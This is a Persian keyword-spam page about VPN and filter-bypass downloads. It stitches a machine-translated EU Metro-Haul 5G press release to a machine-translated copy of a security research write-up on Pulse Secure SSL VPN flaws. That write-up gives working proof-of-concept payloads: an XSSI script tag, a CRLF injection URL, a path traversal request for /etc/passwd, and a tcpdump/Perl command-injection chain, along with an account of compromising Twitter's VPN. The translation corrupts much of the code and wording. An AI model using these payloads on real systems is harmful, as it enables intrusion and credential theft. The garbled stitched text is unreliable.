دانلود کانکشن هوشمند 4speed د انلود کانکشن کریو کانکشن اینترنت anti filter دانلود فیلترشکن

دانلود کانکشن فیلتر باز
شرح kerio control آنتی فیلتر برای ویندوز فون
خرید ویژه ایران خودرو عکس کانکشن
خرید ام وی ام 620 خرید پی وی سی
دانلود کانکشن گریو
فیلتر شدن تلگرام و راه حل آن
کانکشن کار

پروژه مترو-حمل و نقل "فوق العاده موفق" در پشتیبانی از خدمات 5G – METRO-HAUL

پروژه فوق العاده موفق "Metro-Haul" برنامه های نهایی تحویل و نمایش هایی را برای نمایش ارزش کنترل SDN از شبکه های مترو انعطاف پذیر برای پشتیبانی از خدمات 5G

جلسه پیزا پروژه بودجه اتحادیه اروپا به میزبانی اریکسون Telecomunicazioni و CNIT [19659003] پیزا ، ایتالیا ، 31 اکتبر 2019 – 28 ماه از زمان اجرای 3 ساله خود ، نمایندگان 21 سازمان همکار در پیزا برای برنامه ریزی مراحل نهایی پروژه Metro-Haul ملاقات کردند. پیزا خانه دو عضو کنسرسیوم (Ericsson Telecomunicazioni و Consorzio Nazionale Interuniversitario Per Le Telecomunicazioni (CNIT)) است و آنها با مهربانی میزبان این نشست بودند.

Metro-Haul یک برنامه تحقیق و نوآوری اتحادیه اروپا Horizon 2020 است. تلاش برای طراحی و ساخت زیرساخت های هوشمند نوری مترو قادر به پشتیبانی از ترافیک ناشی از شبکه های دسترسی 5G ناهمگن ، پرداختن به افزایش ظرفیت پیش بینی شده و ویژگی های خاص آن ، به عنوان مثال ، تحرک ، تأخیر کم ، لرزنده کم و غیره است. این زیرساخت ها همچنین از تنوع گسترده ای پشتیبانی می کنند. خدمات و استفاده از موارد با تأکید ویژه بر خدمات صنایع مختلف عمودی تا فناوری اطلاعات و ارتباطات.

این پروژه اخیراً در سال دوم بررسی پروژه خود را انجام داده كه در آن زمان كار تاكنون به عنوان برجسته ارزیابی شده است ، و موفقیت فوق العاده ای از طریق انبوه آن ثبت شده است. تأثیر در انتشار و استاندارد سازی. در مدت زمان بیش از دو سال ، این پروژه بیش از 170 مقاله را در مجلات و رویه های کنفرانس منتشر کرده است. مقالات و وبلاگ پروژه را می توان در وب سایت آن به آدرس https://www.metro-haul.eu/.ociation19659005 با توجه یافتن فن آوری شبکه 5G جدید طیف گسترده ای از خدمات جدید را تسهیل خواهد کرد که به طور اساسی تغییر خواهد کرد کاربران اینترنت را تجربه می کنند ، "گفت: آنتونیو دئریکو ، محقق ارشد Ericsson Telecomunicazioni. "این اتصال دستگاه های هوشمند از جمله در وسایل نقلیه خودمختار را تسهیل می کند ، و برنامه های مشترک بین کاربران را با حرکت در زندگی آنها تسهیل می کند."

"اریکسون از بخشی از پروژه Metro-Haul خوشحال است." . "ما در بسیاری از فن آوری های لازم برای ساختن یک شبکه 5G پایان به کار متخصص هستیم و ضروری است که ما نقش موثری در تحقیقات پیشرو در مورد نحوه ساخت و استقرار این شبکه ها داشته باشیم."

فیلیپو کوگینی ، مدیر CNIT در Metro گفت: "CNIT یک کنسرسیوم غیر انتفاعی است که در سال 1995 تأسیس شده و 37 دانشگاه عمومی ایتالیا را برای انجام فعالیت های تحقیقاتی ، نوآوری و آموزش / آموزش در زمینه فناوری اطلاعات و ارتباطات گرد هم آورده است." حمل و نقل. "یکی از پنج آزمایشگاه ملی ما در پیزا واقع شده است و ما در شبکه ها و فن آوری های فوتونیک تخصص داریم."

"CNIT توسعه دهنده پیشرو تجهیزات نوری پیشرفته است و ما خوشحالیم که ROADM ها و ماتریس های سوئیچینگ ما به عنوان هسته استفاده می شوند. مؤلفه های سناریوهای تظاهرات مترو-هال ، "فیلیپو توضیح داد. "این تظاهرات ها برای تعیین ارزش Metro-Haul و اثبات اینكه طیف گسترده ای از فن آوری های تولید شده توسط شرکاء می توانند برای ارائه خدمات واقعی در شبکه های واقعی ادغام شوند ، مهم است."

این برنامه کامل برای پروژه بسیار مهم بوده است. زیرا بیش از 40 نفر را از سراسر اروپا گرد هم آورده اند تا جزئیات تظاهرات را نهایی کنند. سناریوهایی که نمایش داده می شود پیچیده است و بحث های این هفته بسیار شدید بوده است ، اما پیشرفت مهم زیادی انجام شده است و ما اطمینان داریم که قادر خواهیم بود قبل از پایان پروژه در تابستان سال 2020 شبکه های عملیاتی معتبر را نشان دهیم.

درباره Metro-Haul

که در اواسط سال 2017 راه اندازی شد ، پروژه Metro-Haul بودجه (GA 761727) را از برنامه تحقیق و نوآوری Horizon 2020 اتحادیه اروپا دریافت می کند. هدف از این پروژه 7.7 میلیون یورو طراحی و ساخت زیرساخت های هوشمند مترو نوری است که قادر به پشتیبانی از ترافیک ناشی از شبکه های دسترسی 5G ناهمگن ، پرداختن به افزایش ظرفیت پیش بینی شده و ویژگی های خاص آن از جمله تحرک ، تأخیر کم و جهش کم است. این زیرساخت همچنین از خدمات متنوعی پشتیبانی خواهد کرد و از موارد خاص با تأکید ویژه بر خدمات صنایع مختلف به صورت ICT استفاده خواهد کرد.

وب سایت: https://metro-haul.eu
توییتر: MetroHaul
Linked In: https://www.linkedin.com/groups/13543287 موفق19459010LOADResearchGate: https://www.researchgate.net/project/Metro-Haulociation19659015]

خرید وینگل 5 تک کابین دانلود کانکشن کریو ویندوز 8 خرید پی وی سی خرید ام وی ام 315 جدید

خرید وینگل 5 تک کابین دانلود کانکشن کریو ویندوز 8 خرید پی وی سی خرید ام وی ام 315 جدید

خرید vpn like خرید vpn kerio رایگان
دانلود کانکشن درسا
کانکشن پرسرعت دانلود 4speed connection کریو سیسکو
خرید vpn برای iphone 5s
کانکشن هوشمند توربو خرید vpn هفتگی خرید vpn برای آیفون 4s
نرم افزار انتی فیلتر اندروید
کانکشن فیلتر شکن سیسکو

حمله به SSL VPN – قسمت 3: زنجیره ای Golden Pulse Secure SSL VPN RCE ، با توییتر به عنوان مورد مطالعه!

نویسنده: Orange Tsai ( @ orange_8361 ) and Meh Chang (mehqq_ )

سلام ، این آخرین قسمت از سری Attacking SSL VPN است. اگر هنوز مقاله های قبلی را نخوانده اید ، لینکهای سریع برای شما وجود دارد:

بعد از اینکه تحقیقات خود را در بلک هات منتشر کردیم ، به دلیل شدت زیاد و تأثیرات بسیار زیاد ، توجه و بحث های زیادی را به خود جلب کرد. بسیاری از مردم اخبار دست اول را می خواستند و از اینكه تعجب می شود (خصوصاً Pulse Secure preAuth one) منتشر می شود ، شگفت زده می شوند.

ما همچنین این موضوع را در داخل مورد بحث قرار دادیم. در واقع ، ما می توانیم بدون هیچ گونه نگرانی کل سوء استفاده ها را کنار بگذاریم و افشای رسانه های زیادی را بدست آوریم. با این حال ، به عنوان یک شرکت امنیت ، مسئولیت ما این است که جهان را ایمن تر کنیم. بنابراین تصمیم گرفتیم افشای عمومی را به تعویق بیندازیم تا به دنیا فرصت بیشتری برای اعمال تکه ها بدهیم!

متأسفانه ، سوء استفاده ها توسط شخص دیگری فاش شد. آنها را می توان به راحتی در GitHub [1] [2] [3] و بهره برداری از db یافت [1]. راستش ، ما نمی توانیم بگوییم که آنها اشتباه هستند ، زیرا اشکالات کاملا چند ماه پیش برطرف شده اند ، و آنها وقت خود را صرف متفاوت / معکوس / تولید مثل کردند. اما واقعاً این سؤال است که می توان از جامعه امنیتی سؤال کرد: اگر سلاحی در سطح هسته ای دارید ، چه زمانی برای افشای عمومی آماده است؟

ما شنیده ایم که بیش از 25 برنامه فضل اشکال مورد سوء استفاده قرار می گیرد. از آمار بد پکت ، تعداد زیادی از نیروهای نظامی Fortune 500 ، ایالات متحده ، دولت ، مؤسسات مالی و دانشگاهها نیز تحت تأثیر این امر قرار دارند. حتی 10 سرور ناسا وجود دارد که در معرض این اشکال قرار دارند . بنابراین ، این افشاگری های عمومی زودرس در واقع این افراد را مجبور می کند تا SSL VPN خود را ارتقا دهند ، این بخش خوبی است.

از طرف دیگر ، نکته بد این است که در این میان تعداد فزاینده ای از بات نت ها وجود دارند که اینترنت را اسکن می کنند. اطلاعات همچنین اشاره می کند که در حال حاضر یک گروه چین APT وجود دارد که از این اشکال سوء استفاده می کند. این یک فاجعه اینترنتی است. ظاهرا هنوز جهان آماده نیست. بنابراین ، اگر Palo Alto ، Fortinet یا Pulse Secure SSL VPN خود را به روز نکرده اید ، لطفاً آن را ASAP به روز کنید.

Pulse Secure رهبر بازار SSL VPN است که راه حل های دسترسی ایمن حرفه ای را برای Hybrid IT ارائه می دهد. Pulse Secure مدتهاست که در صف تحقیقات ما قرار دارد زیرا این یک زیرساخت مهم Google است که یکی از اهداف بلند مدت ما است. با این حال ، گوگل مدل امنیتی Zero Trust را اعمال می کند ، بنابراین VPN اکنون حذف شده است.

ما اواسط دسامبر سال گذشته شروع به بررسی Pulse Secure کردیم. در 2 ماه اول ، ما هیچ چیزی دریافت نکردیم. Pulse Secure از شیوه کدگذاری خوب و آگاهی از امنیت برخوردار است به طوری که پیدا کردن اشکالات پیش پا افتاده دشوار است. در اینجا یک مقایسه جالب وجود دارد ، ما در اولین روز تحقیق ما پرونده دلخواه خواندن CVE-2018-13379 را در FortiGate SSL VPN یافتیم …

Pulse Secure نیز عاشق Perl است و تعداد زیادی پسوند Perl را در C ++ می نویسد. تعامل بین پرل و C ++ برای ما نیز گیج کننده است ، اما در حالی که زمان بیشتری را برای حفاری در آن هزینه کردیم با آن بیشتر آشنا شدیم. سرانجام ، ما اولین خون را در 8 مارس 2019 گرفتیم! این یک سرریز مبتنی بر پشته بر روی رابط مدیریت است! اگرچه این اشکال چندان مفید نیست ، از آن زمان پیشرفت تحقیقات ما در حال پیگیری بود و ما اشکالات بیشتری را کشف کردیم.

ما تمام یافته های خود را به Pulse Secure PSIRT در 22 مارس 2019 گزارش دادیم. . پاسخ آنها بسیار سریع است و این آسیب پذیری ها را جدی می گیرند! پس از چندین تماس کنفرانسی با Pulse Secure ، آنها تمام مشکلات را فقط طی یک ماه برطرف کردند ، و تکه ها را در 24 آوریل 2019 منتشر کردند. شما می توانید مشاوره امنیتی دقیق را بررسی کنید!

زمان بسیار خوبی برای همکاری با Pulse Secure است. از دیدگاه ما ، Pulse Secure مسئولیت پذیرترین فروشنده در بین کلیه فروشندگان SSL VPN است که ما در این مورد اشکالات را گزارش کرده ایم!

ما در کل 7 آسیب پذیری پیدا کرده ایم. در اینجا لیست است. ما هر یک را معرفی خواهیم کرد ، اما روی CVE-2019-11510 و CVE-2019-11539 بیشتر تمرکز خواهیم کرد.

  • CVE-2019-11510 – خواندن پرونده های دلخواه پیش نویس
  • CVE-2019-11542 – Post-auth ( سرپرست) سرریز بافر Stack Buffer
  • CVE-2019-11539 – تزریق فرمان پس از ات (مدیر)
  • CVE-2019-11538 – Post-auth (کاربر) خواندن پرونده های دلخواه از طریق NFS
  • CVE-2019-11508 – نوشتن پرونده خودسرانه پس از اتمام (کاربر) از طریق NFS
  • CVE-2019-11540 – گنجاندن اسکریپت متقاطع سایت پس از نویسنده
  • CVE-2019-11507 – برنامه نویسی متقاطع پس از اتمام

نسخه های تحت تأثیر

  • Pulse Connect Secure 9.0R1 – 9.0R3.3
  • Pulse Connect Secure 8.3R1 – 8.3R7
  • Pulse Connect Secure 8.2R1 – 8.2R12
  • Pulse Connect Secure 8.1R1 – 8.1R15
  • Pulse Connect Secure 8.2R1 – 8.2R12
  • Pulse Connect Secure 8.1R1 – 8.1R15
  • Pulse Connect Secure 8.0R1 – 9.0R3.3
  • Secure Policy 9.0R1 – 9.0R3.3
  • Security Pulse Security 5.4R1 – 5.4R7
  • Security Pulse Secure 5.3R1 – 5.3R12
  • Policy Pulse Secure 5.2R1 – 5.2R12
  • Security Pulse Safe 5.1R1 – 5.1R15

CVE-2019-11540: مقطع سایت Ript Incociation

اسکریپت /dana/cs/cs.cgi شناسه جلسه را در جاوا اسکریپت ارائه می دهد. از آنجا که نوع محتوا روی Application / x-javascript تنظیم شده است ، می توانیم حمله XSSI را انجام دهیم تا کوکی DSID را به سرقت برسانیم!

حتی بدتر ، محافظت CSRF در Pulse Secure SSL VPN است. DSID با استفاده از این XSSI ، می توان از همه محافظت در برابر CSRF دور زد!

PoC:



 <script  src =  "https: //sslvpn/dana/cs/cs.cgi؟ action = Appletobj" [19659040]> 

CVE-2019-11507: برنامه نویسی متقابل

تزریق CRLF در وجود دارد /dana/home/cts_get_ica.cgi . به دلیل تزریق ، می توانیم هدرهای HTTP دلخواه را جعل کرده و محتوای HTML مخرب را تزریق کنیم.

PoC:

 https: //sslvpn/dana/home/cts_get_ica.cgi
؟ bm_id = x
& vdi = 1
& appname = aa٪ 0d٪ 0aContent-Type :: text / html٪ 0d٪ 0aContent-Disposition :: inline٪ 0d٪ 0aaa: bb 

CVE-2019-11538: Post-auth (کاربر) خواندن پرونده خودسرانه از طریق NFS [19659034] دو آسیب پذیری زیر (CVE-2019-11538 و CVE-2019-11508) بر تنظیمات پیش فرض تأثیر نمی گذارد. به نظر می رسد تنها اگر مدیر اشتراک گذاری NFS را برای کاربران VPN پیکربندی کند.

اگر یک مهاجم بتواند هر پرونده ای را روی سرور NFS از راه دور کنترل کند ، می تواند فقط یک لینک نمادین برای هر پرونده ایجاد کند ، مانند / etc / passwd. ، و آن را از رابط وب بخوانید. علت اصلی این است که اجرای NFS سرور از راه دور را به عنوان یک دایرکتوری واقعی لینوکس سوار می کند ، و اسکریپت /dana/fb/nfs/nfb.cgi بررسی نمی کند که آیا فایل دستیابی شده یک سیمکارت است یا خیر.

CVE-2019-11508: نوشتن پرونده خودسرانه از طریق NFS

این یک کمی شبیه به مورد قبلی است ، اما با یک بردار حمله متفاوت!

وقتی مهاجم آپلود می کند. یک پرونده ZIP به NFS از طریق رابط وب ، اسکریپت /dana/fb/nfs/nu.cgi نام پرونده موجود در ZIP را ضد نمی کند. بنابراین ، یک مهاجم می تواند یک فایل ZIP مخرب بسازد و مسیر را با ../ در نام پرونده طی کند! هنگامی که Pulse Secure فشرده شد ، مهاجم می تواند هر آنچه را که می خواهد به هر مسیری بارگذاری کند!

CVE-2019-11542: Post-auth (مدیر) Stack Buffer Overflow

سرریز بافر مبتنی بر پشته در ماژول Perl زیر وجود دارد. پیاده سازی ها:

  • DSHC :: ThinkForReporting
  • DSHC :: isSendReasonStringEnabled
  • DSHC :: getRemedCustomInstructions

این پیاده سازی ها از sprintf استفاده می کنند تا بدون افزایش طول . این اشکال را می توان در بسیاری از مناطق ایجاد کرد ، اما در اینجا ما از /dana-admin/auth/hc.cgi به عنوان PoC ما استفاده می کنیم.

 https: // sslvpn / dana-admin / auth / hc. cgi
؟ platform = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
و خط مشی = 0

و می توانید خطای بخش را از dmesg

 cgi-server [22950] مشاهده کنید: segfault at 61616161 ip 0000000002a80afd sp 00000000ff9a4d50 error 4 در DSHC.so: [1965909710] CVE-2019: خواندن پرونده های خودسرانه از پیش نویس 

در واقع ، این شدیدترین اشکال در این زمان است. در اجرای سرور وب است. همانطور که اسلایدهای ما ذکر کردند ، Pulse Secure سرور وب و معماری وب خود را از ابتدا پیاده سازی می کند. اعتبارسنجی مسیر اصلی بسیار دقیق است. با این حال ، از نسخه 8.2 ، Pulse Secure ویژگی جدیدی به نام HTML5 Access را معرفی کرد ، این ویژگی مورد استفاده برای تعامل با Telnet ، SSH و RDP توسط مرورگرها است. به لطف این ویژگی جدید ، اعتبارسنجی مسیر اصلی سست می شود.

به منظور اداره منابع استاتیک ، Pulse Secure یک IF-CONDITION جدید ایجاد کرد تا اعتبار سنجی مسیر در ابتدا سخت تر شود. کد به اشتباه از درخواست-> uri و درخواست-> filepath استفاده می کند ، بنابراین می توانیم / dana / html5acc / guacamole / را در انتهای آن مشخص کنیم. رشته پرس و جو برای دور زدن اعتبار و ایجاد درخواست-> filepath به هر پرونده ای که می خواهید بارگیری کنید!

و شایان ذکر است که برای خواندن پرونده های دلخواه ، باید را مشخص کنید. ] / dana / html5acc / guacamole / دوباره در وسط مسیر. در غیر این صورت ، شما فقط می توانید پسوندهای محدود پرونده ای مانند .json ، .xml یا .html را بارگیری کنید.

به دلیل سوءاستفاده در طبیعت ، دیگر هیچ نگرانی برای نشان دادن بارپرداخت وجود ندارد:

 واردات   درخواست 

 r   =   درخواست .  دریافت  ( 'https: //sslvpn/dana-na/../dana/html5acc/guacamole/ .. /../../../../../etc/passwd؟/dana/html5acc/guacamole/'roulette19659042 معروف)ross19659112 معروفprintociation19659106 غلط19659107 با نام های مختلف. ]

CVE-2019-11539: تزریق فرمان پست-auth (مدیر)

آخرین مورد تزریق فرمان در رابط مدیریت است. ما این آسیب پذیری را خیلی زود پیدا کردیم ، اما در ابتدا راهی برای بهره برداری از آن پیدا نکردیم. در حالی که ما در وگاس بودیم ، یکی از دوستانم به من گفت که او قبلاً همان اشکال را پیدا کرد ، اما راهی برای بهره برداری از آن پیدا نکرد ، بنابراین وی به فروشنده گزارشی نداد.

با این حال ، ما این کار را کردیم ، و ما از یک روش بسیار هوشمندانه بهره برداری می کنیم:)

علت اصلی این آسیب پذیری بسیار ساده است. در اینجا یک قطعه کد از /dana-admin/diag/diag.cgi است:

 # ... 
 $ گزینه ها   =   tcpdump_options_syntax_check  ( CGI ::  param  ( "options" ))؛ 

 # ... 
 sub  tcpdump_options_syntax_check   {
   my   $ گزینه ها   =   shift ؛ 
   بازگشت   $ گزینه ها   اگر سیستم   سیستم ] ( "$ TCPDUMP_COMMAND- گزینه های $> / dev / null 2 > & 1 ")   ==   0 ؛ 
   Return   undef ؛ 
} 

آنقدر واضح و واضح است که همه می توانند نشان دهند که یک تزریق دستور در گزینه های پارامتر وجود دارد! با این حال ، آیا این آسان است؟ خیر!

به منظور جلوگیری از آسیب پذیری های احتمالی ، Pulse Secure سختی های زیادی را بر روی محصولات خود اعمال می کند! مانند بررسی یکپارچگی سیستم ، سیستم فایلهای فقط خواندنی و ماژول برای قلاب زدن همه دعوتهای خطرناک Perl مانند سیستم ، open و backtick

این ماژول DSSAFE.pm نامیده می شود. این تجزیه و تحلیل خط فرمان خود را پیاده سازی می کند و دوباره هدایت I / O را در پرل اجرا می کند. در اینجا قطعات کد در Gist وجود دارد.

از قطعات کد ، می توانید ببینید که سیستم اصلی را جایگزین می کند و بسیاری از چک های موجود در __ parsecmd را انجام می دهد. همچنین بسیاری از شخصیت های بد مانند: [

 [&*(){}[]  `؛  |  | ؟  n ~ <>] را مسدود می کند

بررسی ها بسیار دقیق است به طوری که ما نمی توانیم تزریق دستور انجام دهیم. ما چندین روش برای دور زدن آن تصور کردیم و اولین چیزی که از ذهن من بیرون آمد تزریق استدلال است. ما همه استدلالهایی را ذکر کردیم که TCPDUMP پشتیبانی می کند و دریافتیم که دستور [post] postzate -z ممکن است مفید باشد. اما نکته تأسف آور این است که TCPDUMP در Pulse Secure برای پشتیبانی از این ویژگی آبدار خیلی قدیمی است (v3.9.4 ، سپتامبر 2005) ، بنابراین ما شکست خوردیم: (

در هنگام بررسی سیستم ، فهمیدیم که اگرچه پنهان کاری فقط خواندنی است ، ما هنوز می توانیم از مکانیزم حافظه پنهان سوءاستفاده کنیم. Pulse Secure نتیجه این الگو را در / data / runtime / tmp / tt / ذخیره می کند تا سرعت در ارائه اسکریپت سرعت یابد. بنابراین تلاش بعدی ما این است که پرونده را با استفاده از استدلال -w با نوشتن پرونده در فهرست شاخه کش بنویسید ، با این وجود نوشتن یک پرونده چندگلوت در قالب PCAP و Perl غیرممکن است.

همانطور که به نظر می رسد ما به انتها رسیده بودیم. تزریق آرگومان ، ما سعی کردیم تا عمیق تر به اجرای DSSFAFE.pm بپردازیم تا ببینیم آیا چیزی وجود دارد که بتوانیم از آن استفاده کنیم. آیا در اینجا یک نقص در خط فرمان پیدا کرده ایم. اگر ناقص I / O را وارد کنیم. تغییر مسیر ، بقیه قسمت تغییر مسیر کوتاه خواهد شد. گرچه این یک نقص کوچک است ، اما به ما کمک کرد تا کنترل مجدد I / O r را انجام دهیم ویرایش! با این حال ، مشکلی که ما نمی توانیم یک اسکریپت معتبر Perl تولید کنیم ، هنوز برای ما زحمت کشیده است.

ما در اینجا گیر کرده ایم و وقت آن است که از این کادر فکر کنیم. تولید اسکریپت معتبر پرل از طریق STDOUT دشوار است ، آیا می توانیم فقط Perl را توسط STDERR بنویسیم؟ پاسخ بله است. وقتی [TCPDUMP TCPDUMP را مجبور می کنیم که پرونده ای وجود ندارد را از طریق -r-read-file بخوانیم. این خطا را نشان می دهد:

tcpdump: [filename]: هیچ پرونده یا پوشه ای

وجود ندارد. به نظر می رسد ما می توانیم " تا حدی " پیام خطا را کنترل کنیم. سپس نام پرونده چاپ 123 # را امتحان کردیم ، و جادو اتفاق می افتد!

 $  tcpdump  -d   -r   'print 123 #' 
  tcpdump: چاپ 123 #: فایلی یا دایرکتوری وجود ندارد
 
 $  tcpdump  -d   -r   'print 123 #'  2> & 1 | perl -
  123

پیام خطا اکنون به یک اسکریپت معتبر پرل تبدیل می شود. چرا؟ خوب ، بیایید اکنون یک درس Perl 101 داشته باشیم!

همانطور که می بینید ، پرل از برچسب GOTO پشتیبانی می کند ، بنابراین tcpdump : به یک برچسب معتبر در Perl تبدیل می شود. سپس بقیه را با هشتگ اظهار نظر می کنیم. با استفاده از این ترفند خلاق ، می توانیم اکنون Perl معتبر تولید کنیم!

سرانجام ، ما از نماد I / O ناقص < برای فریب فرمان DSSAFE.pm استفاده می کنیم و دستورالعمل را تغییر می دهیم. STDERR را در فهرست حافظه پنهان! در اینجا استثمار نهایی است:

 -r $ x = "ls /" ، سیستم $ x # 2> /data/runtime/tmp/tt/setcookie.thtml.ttc <

فرمان جمع شده به نظر می رسد:

 / usr / sbin / tcpdump  -d  
  -r  '$ x = "ls /"، system $ x #' 
 2> /data/runtime/tmp/tt/setcookie.thtml.ttc <
 >  / dev / null
 2> و 1

و تولید شده setcookie.thtml.ttc به نظر می رسد:

  tcpdump:   $ x  =  "ls /" ،  system [19659126] $ x  #: فاقد پرونده یا دایرکتوری 

پس از انجام این کار ، فقط می توانیم صفحه مربوطه را برای اجرای دستور خود واکشی کنیم:

  $  curl https: //sslvpn/dana-na/auth/setcookie.cgi
 boot bin home lib64 mnt opt ​​proc sys usr var
 داده ها و غیره lib از دست داده + ماژول های pkg sbin tmp را یافتید
 ...

تاکنون ، کل بخش فنی این تزریق فرمان به پایان رسیده است. با این حال ، ما فکر می کنیم ممکن است یک روش خلاقانه دیگر برای بهره برداری از این امر وجود داشته باشد ، اگر یکی از آنها را پیدا کردید ، لطفاً به من بگویید!

پس از Pulse Secure تمام اشکالات را در 24 آوریل 2019 وصله کرد. ما برای اندازه گیری زمان پاسخگویی به هر شرکت بزرگ ، نظارت بر اینترنت را دنبال می کردیم. توییتر یکی از آنهاست. آنها به دلیل برنامه bug bounty و هکرها خوب هستند. با این حال ، سوءاستفاده از 1 روز درست بعد از انتشار پچ نامناسب است. بنابراین 30 روز صبر می کنیم تا توییتر SSL VPN خود را به روز کند.

باید بگوییم ، ما در آن زمان عصبی بودیم. اولین کاری که هر روز صبح انجام دادیم این است که بررسی کنیم آیا توییتر SSL VPN خود را ارتقا می دهد یا نه! این زمان فراموش نشدنی برای ما بود: P

ما شروع به هک کردن توییتر در 28 مه 2019 کردیم. در طی این عملیات با موانع مختلفی روبرو هستیم. مورد اول ، اگرچه می توانیم رمزعبور ساده کارمندان توییتر را بدست آوریم ، اما به دلیل تأیید هویت Two Factor ، هنوز نمی توانیم وارد SSL VPN آنها شویم. در اینجا ما دو راه برای دور زدن آن را پیشنهاد می کنیم. مورد اول اینست که مشاهده کردیم توییتر از راه حل Duo استفاده می کند. در کتابچه راهنما ذکر شده است:

امنیت برنامه Duo شما با امنیت کلید مخفی شما (اسکی) مرتبط است. آن را به عنوان اعتبار معتبر خود امن کنید. آنرا با افراد غیرمجاز به اشتراک نگذارید و به هرکسی تحت هر شرایطی آن را ایمیل نکنید!

بنابراین اگر بتوانیم کلید مخفی را از سیستم خارج کنیم ، می توانیم API Duo را برای دور زدن 2FA اهرم کنیم. با این حال ، ما راهی سریعتر برای دور زدن آن پیدا کردیم. توییتر ویژگی Roaming Session را فعال کرد ، که برای تقویت تحرک استفاده می شود و امکان جلسه در چندین مکان IP را فراهم می کند.

به دلیل این ویژگی " راحت " ، ما فقط می توانیم پایگاه داده جلسه را بارگیری کنیم و کوکی های خود را جعل کنیم. برای ورود به سیستم آنها!

تاکنون ، ما می توانیم به اینترانت توییتر دسترسی پیدا کنیم. با این وجود ، هدف ما دستیابی به اجرای کد است! به نظر می رسد مهم تر از دسترسی به اینترانت است. بنابراین ما می خواهیم اشکال تزریق فرمان خود (CVE-2019-11539) را با هم زنجیر کنیم. خوب ، در اینجا ، ما با یک مانع دیگر روبرو شدیم. این رابط مدیریت محدود است!

همانطور که قبلاً اشاره کردیم ، اشکال ما در رابط مدیریت است. اما از نظر امنیتی ، بیشتر شرکت ها این رابط را به صورت عمومی غیرفعال می کنند ، بنابراین ما برای دسترسی به صفحه مدیر نیاز به روش دیگری داریم. اگر مقاله قبلی ما را با دقت خوانده اید ، ممکن است ویژگی " WebVPN " را به خاطر بیاورید! WebVPN یک پروکسی است که به اتصال به هر نقطه کمک می کند. بنابراین ، بیایید به خود متصل شویم.

بله ، SSRF است!

در اینجا ما از یک ترفند کوچک برای دور زدن محافظت های SSRF استفاده می کنیم.

آها! از طریق SSRF ، اکنون می توانیم رابط را لمس کنیم! سپس آخرین مانع بالا آمد. ما هیچ رمزعبور ساده ای از مدیران نداریم. وقتی Perl می خواهد داده ها را با رویه های بومی مانند برنامه افزودنی Perl در C ++ یا وب سرور تبادل کند ، از حافظه پنهان برای ذخیره داده ها استفاده می کند. مشکل این است که Pulse Secure فراموش می کند که داده های حساس را پس از تبادل پاک می کند ، به همین دلیل می توانیم کلمات عبور ساده را در حافظه پنهان بدست آوریم. اما عملاً ، بیشتر مدیران فقط برای اولین بار وارد سیستم خود می شوند ، بنابراین گرفتن رمز ساده متن مدیر سخت است. تنها موردي كه ما دريافت كرديم ، هش رمز عبور در sha256 (md5_crypt (نمك ، ...)) است …

اگر در ترك كردن هشي تجربه داريد ، مي دانيد چقدر سخت است. بنابراین ...

ما یک AWS 72 هسته ای را برای شکستن آن راه اندازی کردیم.

ما هش را شکستیم و RCE را با موفقیت گرفتیم! من فکر می کنم خوش شانس هستیم زیرا از مشاهده ما ، یک سیاست رمز عبور بسیار قوی در مورد کارمندان توییتر وجود دارد. اما به نظر می رسد این خط مشی برای مدیر اعمال نمی شود. طول رمز عبور مدیر تنها ده نفر است و اولین شخصیت آن B است. این در مرحله بسیار اولیه از صف ترک ما است ، به طوری که می توانیم ظرف 3 ساعت هش را بشکنیم.

همه یافته های خود را به توییتر گزارش دادیم و بالاترین امتیاز را از آنها دریافت کردیم. اگرچه ما نمی توانیم اثبات کنیم ، اما به نظر می رسد این اولین اجرای از راه دور کد در توییتر است! اگر به گزارش کامل علاقه دارید ، می توانید برای اطلاعات بیشتر به لینک HackerOne مراجعه کنید.

چگونه می توان چنین حملات را کاهش داد؟ در اینجا چندین توصیه ارائه می دهیم.

اولین گواهی Client-Side است. این همچنین موثرترین روش است. بدون داشتن گواهی معتبر ، اتصال مخرب در طی مذاکرات SSL از بین می رود! دوم تأیید هویت چند عاملی است. اگرچه این بار توییتر 2FA را شکسته ایم ، با یک تنظیم مناسب ، MFA هنوز هم می تواند سطح حمله بی شماری را کاهش دهد. در مرحله بعد ، ممیزی ورود به سیستم را کامل کنید و به یاد داشته باشید که به یک سرور ورود به سیستم خارج از مرز ارسال کنید.

همچنین ، موجودی دارایی سازمانی خود را مرتباً انجام دهید و در مشاوره امنیتی فروشنده شرکت کنید. از همه مهمتر ، همیشه سیستم خود را به روز کنید!

شرکت ما ، DEVCORE ، حرفه ای ترین خدمات تیم قرمز در آسیا را ارائه می دهد. در این بخش جایزه ، اجازه دهید صحبت کنیم که چگونه تیم قرمزها را بیشتر کنیم RED !

ما همیشه می دانیم که در یک عملیات تیم قرمز ، رایانه شخصی از ارزش بیشتری برخوردار است! چندین روش در مدرسه قدیمی برای به خطر انداختن مشتری VPN از طریق SSL VPN قبل وجود دارد ، مانند حمله به سوراخ در آب و جایگزینی عامل VPN.

در طول تحقیق ما ، یک وکتور حمله جدید پیدا کردیم تا همه مشتری ها را به دست بگیرد. این ویژگی " اسکریپت ورود به سیستم " است. تقریباً در هر SSL VPN مانند OpenVPN ، Fortinet ، Pulse Secure ... و موارد دیگر ظاهر می شود. این می تواند اسکریپت های مربوطه را برای سوار کردن فایل پرونده شبکه یا اجرای جدول مسیریابی پس از برقراری اتصال VPN ، اجرا کند.

به دلیل این ویژگی " سازگار با هکرها " ، هنگامی که امتیاز مدیر را گرفتیم ، می تواند از این ویژگی برای آلوده کردن کلیه مشتریان VPN استفاده کند! در اینجا ما به عنوان نمونه از Pulse Secure استفاده می کنیم و نشان می دهیم که چگونه نه تنها SSL VPN را به خطر بیاندازید بلکه کلیه مشتریان متصل خود را نیز به دست می گیرید:

خوب ، در اینجا پایان این سری Attacking SSL VPN است! از یافته های ما ، SSL VPN چنین سطح حمله بزرگی است که محققان امنیتی معدودی در آن حفر می شوند. ظاهراً سزاوار توجه بیشتر است. ما امیدواریم که این نوع سریال بتواند محققان دیگر را به مشارکت در این زمینه ترغیب کند و امنیت شرکت ها را ارتقا بخشد!

با تشکر از همه بچه هایی که با آنها ملاقات کردیم ، همکاری و همکاری داشتیم. ما در آینده تحقیقات خلاقانه تری را منتشر خواهیم کرد:)

.

کانکشن استرینگ چیست کانکشن اینترنت همراه اول خرید vpn ikev2 برای ویندوزفون خرید رمز vpn kerio

کانکشن استرینگ چیست کانکشن اینترنت همراه اول خرید vpn ikev2 برای ویندوزفون خرید رمز vpn kerio

خرید vpn روزانه دانلود کانکشن ماهان psiphon 3 anti filter
